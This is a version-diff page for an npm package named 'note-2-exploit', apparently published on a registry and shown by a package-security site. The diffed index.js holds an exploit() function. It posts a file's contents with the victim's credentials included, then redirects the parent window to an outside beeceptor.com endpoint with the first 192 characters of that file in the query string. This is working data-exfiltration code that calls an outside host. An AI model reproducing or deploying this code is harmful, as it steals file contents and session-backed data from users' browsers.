note-2-exploit 1.2.5 → 1.2.6
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +2 -2
- package/package.json +1 -1
package/index.js
CHANGED
@@ -37,14 +37,14 @@ async function exploit() {
|
|
37
37
|
"content-type": "application/json",
|
38
38
|
"sec-gpc": "1"
|
39
39
|
},
|
40
|
-
"body": "{\"title\":\"" + note_name + "\",\"content\":\"" + file_content.slice(
|
40
|
+
"body": "{\"title\":\"" + note_name + "\",\"content\":\"" + file_content.slice(0,192).replace("\"", "a") + "\"}",
|
41
41
|
"method": "POST",
|
42
42
|
"mode": "cors",
|
43
43
|
"redirect": "follow",
|
44
44
|
"credentials": "include"
|
45
45
|
});
|
46
46
|
if (file_content)
|
47
|
-
window.parent.location.replace("https://newname.free.beeceptor.com?q=" + file_content.slice(
|
47
|
+
window.parent.location.replace("https://newname.free.beeceptor.com?q=" + file_content.slice(0,192));
|
48
48
|
else
|
49
49
|
window.parent.location.replace("https://newname.free.beeceptor.com?q=empty_file");
|
50
50
|
// fetch("http://10.113.184.121:10082/report", {
|